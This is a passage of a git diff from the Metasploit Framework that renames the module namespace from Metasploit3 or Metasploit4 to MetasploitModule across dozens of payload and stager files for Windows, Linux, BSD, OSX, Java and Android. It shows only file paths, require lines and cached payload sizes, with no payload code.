+7,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 272 diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 8f59094b79..4aba839b4d 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule CachedSize = 957999 diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index 488b28e773..9b1ac80418 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule CachedSize = 959043 diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 1782e416cb..91b073a44b 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule CachedSize = 959043 diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 9b299268cf..8cdbd91f25 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule CachedSize = 957999 diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index 33c1f06b81..e2c6f3a72b 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit3 +module MetasploitModule CachedSize = 957999 diff --git a/modules/payloads/singles/windows/metsvc_bind_tcp.rb b/modules/payloads/singles/windows/metsvc_bind_tcp.rb index 69ffe8e323..c38bd1693c 100644 --- a/modules/payloads/singles/windows/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb index 0fd1c8a955..898c4c71ab 100644 --- a/modules/payloads/singles/windows/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/windows/metsvc_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_x86_win' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb index 95ef7b26c2..2d1e407e83 100644 --- a/modules/payloads/singles/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/bind_tcp' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 1703 diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb index 487c0d8d35..b822413140 100644 --- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/reverse_tcp_ssl' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 1711 diff --git a/modules/payloads/singles/windows/shell_bind_tcp.rb b/modules/payloads/singles/windows/shell_bind_tcp.rb index d3059320ea..fc8d6d0f72 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 328 diff --git a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb index 54ba7077c8..584368c19f 100644 --- a/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb +++ b/modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 529 diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index ac19a35a63..0416b159d4 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 386 diff --git a/modules/payloads/singles/windows/shell_reverse_tcp.rb b/modules/payloads/singles/windows/shell_reverse_tcp.rb index dd4c6d1167..4ca47a3d69 100644 --- a/modules/payloads/singles/windows/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 324 diff --git a/modules/payloads/singles/windows/speak_pwned.rb b/modules/payloads/singles/windows/speak_pwned.rb index 579e6863a1..c9f0e8ad52 100644 --- a/modules/payloads/singles/windows/speak_pwned.rb +++ b/modules/payloads/singles/windows/speak_pwned.rb @@ -38,7 +38,7 @@ require 'msf/core' require 'msf/core/payload/windows/exec' -module Metasploit3 +module MetasploitModule CachedSize = 247 diff --git a/modules/payloads/singles/windows/x64/exec.rb b/modules/payloads/singles/windows/x64/exec.rb index 92455a5b9b..af38b18781 100644 --- a/modules/payloads/singles/windows/x64/exec.rb +++ b/modules/payloads/singles/windows/x64/exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 275 diff --git a/modules/payloads/singles/windows/x64/loadlibrary.rb b/modules/payloads/singles/windows/x64/loadlibrary.rb index 8a8141c20b..d0ec05ceed 100644 --- a/modules/payloads/singles/windows/x64/loadlibrary.rb +++ b/modules/payloads/singles/windows/x64/loadlibrary.rb @@ -7,7 +7,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 313 diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 8cdbcd13e4..493bfbf557 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule CachedSize = 1189423 diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 43a55d8c01..ee87c288fe 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule CachedSize = 1190467 diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 5207a0b0d4..43d0262094 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule CachedSize = 1190467 diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index ea5cab3cc8..1ffc004cee 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule CachedSize = 1189423 diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 5dddb7f1c8..01b46f82fc 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_x64_win' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule CachedSize = 1189423 diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb index 7b16dad82d..921531bf8a 100644 --- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/bind_tcp' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 1786 diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb index 524d876cdc..b3dd0e42c7 100644 --- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/reverse_tcp_ssl' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 1794 diff --git a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb index 75debdbd54..9fd2b45fb2 100644 --- a/modules/payloads/singles/windows/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 505 diff --git a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb index 0a4ae497bb..d2b1bb8432 100644 --- a/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 460 diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index 87b2fbf319..1280aec874 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ b/modules/payloads/stagers/android/reverse_http.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index fa93d598f4..0198ac0d8b 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index 6aa6aaa3fa..fe1949d130 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb index d6fe01d68c..34c0eab79f 100644 --- a/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # BSD bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 63 diff --git a/modules/payloads/stagers/bsd/x86/bind_tcp.rb b/modules/payloads/stagers/bsd/x86/bind_tcp.rb index defab03f57..d03ccfb2ee 100644 --- a/modules/payloads/stagers/bsd/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # BSD bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 54 diff --git a/modules/payloads/stagers/bsd/x86/find_tag.rb b/modules/payloads/stagers/bsd/x86/find_tag.rb index 5cad0b982e..0eee8c3051 100644 --- a/modules/payloads/stagers/bsd/x86/find_tag.rb +++ b/modules/payloads/stagers/bsd/x86/find_tag.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/find_tag' # BSD find tag stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 40 diff --git a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb index e295af5b26..5506b36ec0 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # BSD reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 81 diff --git a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb index e044caaa4f..a09c2f6f68 100644 --- a/modules/payloads/stagers/bsd/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsd/x86/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # BSD reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 43 diff --git a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb index d7481715bd..5f6eda8d92 100644 --- a/modules/payloads/stagers/bsdi/x86/bind_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # BSD bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 69 diff --git a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb index 054aea36fd..c15d4b32d9 100644 --- a/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # BSD reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 59 diff --git a/modules/payloads/stagers/java/bind_tcp.rb b/modules/payloads/stagers/java/bind_tcp.rb index e68c528b82..d6d8c0e14e 100644 --- a/modules/payloads/stagers/java/bind_tcp.rb +++ b/modules/payloads/stagers/java/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 5105 diff --git a/modules/payloads/stagers/java/reverse_http.rb b/modules/payloads/stagers/java/reverse_http.rb index f9087ea550..d6a34087cc 100644 --- a/modules/payloads/stagers/java/reverse_http.rb +++ b/modules/payloads/stagers/java/reverse_http.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' -module Metasploit3 +module MetasploitModule CachedSize = 5123 diff --git a/modules/payloads/stagers/java/reverse_https.rb b/modules/payloads/stagers/java/reverse_https.rb index 9072228fbd..d58a67ac2f 100644 --- a/modules/payloads/stagers/java/reverse_https.rb +++ b/modules/payloads/stagers/java/reverse_https.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = 5932 diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb index ca9106a641..9cf7160f42 100644 --- a/modules/payloads/stagers/java/reverse_tcp.rb +++ b/modules/payloads/stagers/java/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 5118 diff --git a/modules/payloads/stagers/linux/armle/bind_tcp.rb b/modules/payloads/stagers/linux/armle/bind_tcp.rb index 1a3e5300e7..963307b1da 100644 --- a/modules/payloads/stagers/linux/armle/bind_tcp.rb +++ b/modules/payloads/stagers/linux/armle/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # Linux bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 232 diff --git a/modules/payloads/stagers/linux/armle/reverse_tcp.rb b/modules/payloads/stagers/linux/armle/reverse_tcp.rb index 8876eba6aa..9d5c456f45 100644 --- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # Linux reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 200 diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb index 4f3481455b..081c85e869 100644 --- a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 212 diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb index 6274680cd0..b717932d91 100644 --- a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 212 diff --git a/modules/payloads/stagers/linux/x64/bind_tcp.rb b/modules/payloads/stagers/linux/x64/bind_tcp.rb index e03be3f9bf..2fe49ef020 100644 --- a/modules/payloads/stagers/linux/x64/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x64/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 78 diff --git a/modules/payloads/stagers/linux/x64/reverse_tcp.rb b/modules/payloads/stagers/linux/x64/reverse_tcp.rb index b8adfa1a65..c499229c58 100644 --- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 68 diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb index 0106b03e01..4e0a657788 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 120 diff --git a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb index 7b1e53a378..1f50b4d8ab 100644 --- a/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/bind_ipv6_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 165 diff --git a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb index 64d035d5b6..64f0c73640 100644 --- a/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # Linux bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 63 diff --git a/modules/payloads/stagers/linux/x86/bind_tcp.rb b/modules/payloads/stagers/linux/x86/bind_tcp.rb index d72c328b3e..b49fdd595b 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 110 diff --git a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb index 6ee52b7a80..47e905fb63 100644 --- a/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/bind_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/linux/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 155 diff --git a/modules/payloads/stagers/linux/x86/find_tag.rb b/modules/payloads/stagers/linux/x86/find_tag.rb index 13f6c4f0ef..967a6965da 100644 --- a/modules/payloads/stagers/linux/x86/find_tag.rb +++ b/modules/payloads/stagers/linux/x86/find_tag.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/find_tag' # Linux find tag stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 37 diff --git a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb index 5812f24621..2dac77ebe7 100644 --- a/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' # Linux Reverse TCP/IPv6 Stager -module Metasploit3 +module MetasploitModule CachedSize = 77 diff --git a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb index 6f0e0762c6..16c273185e 100644 --- a/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # Linux reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 50 diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 6127486d9c..2c2feaf11a 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/linux/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 71 diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb index 3f0d438f87..526e978f0e 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/linux/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 114 diff --git a/modules/payloads/stagers/netware/reverse_tcp.rb b/modules/payloads/stagers/netware/reverse_tcp.rb index 43a6199879..cce195a4c3 100644 --- a/modules/payloads/stagers/netware/reverse_tcp.rb +++ b/modules/payloads/stagers/netware/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 281 diff --git a/modules/payloads/stagers/osx/armle/bind_tcp.rb b/modules/payloads/stagers/osx/armle/bind_tcp.rb index a39946b4ea..a65043fada 100644 --- a/modules/payloads/stagers/osx/armle/bind_tcp.rb +++ b/modules/payloads/stagers/osx/armle/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # OSX bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 248 diff --git a/modules/payloads/stagers/osx/armle/reverse_tcp.rb b/modules/payloads/stagers/osx/armle/reverse_tcp.rb index e8eb886017..d7e214fed7 100644 --- a/modules/payloads/stagers/osx/armle/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/armle/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # OSX reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 184 diff --git a/modules/payloads/stagers/osx/ppc/bind_tcp.rb b/modules/payloads/stagers/osx/ppc/bind_tcp.rb index 5932c3309b..4ae1eee45d 100644 --- a/modules/payloads/stagers/osx/ppc/bind_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/bind_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp' # OSX bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 152 diff --git a/modules/payloads/stagers/osx/ppc/find_tag.rb b/modules/payloads/stagers/osx/ppc/find_tag.rb index d2ceeea3e2..f30b0d7bb2 100644 --- a/modules/payloads/stagers/osx/ppc/find_tag.rb +++ b/modules/payloads/stagers/osx/ppc/find_tag.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/find_tag' # OSX find tag stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 76 diff --git a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb index 8bf74f4a68..75b7f06b5c 100644 --- a/modules/payloads/stagers/osx/ppc/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/ppc/reverse_tcp.rb @@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp' # OSX reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 100 diff --git a/modules/payloads/stagers/osx/x64/bind_tcp.rb b/modules/payloads/stagers/osx/x64/bind_tcp.rb index 5abee59824..aebc72f921 100644 --- a/modules/payloads/stagers/osx/x64/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x64/bind_tcp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 185 diff --git a/modules/payloads/stagers/osx/x64/reverse_tcp.rb b/modules/payloads/stagers/osx/x64/reverse_tcp.rb index 9a799fbd22..c9976fdb7d 100644 --- a/modules/payloads/stagers/osx/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x64/reverse_tcp.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 154 diff --git a/modules/payloads/stagers/osx/x86/bind_tcp.rb b/modules/payloads/stagers/osx/x86/bind_tcp.rb index c058ae14e3..64cc3a4ffa 100644 --- a/modules/payloads/stagers/osx/x86/bind_tcp.rb +++ b/modules/payloads/stagers/osx/x86/bind_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/bind_tcp' # Mac OS X x86 bind TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 144 diff --git a/modules/payloads/stagers/osx/x86/reverse_tcp.rb 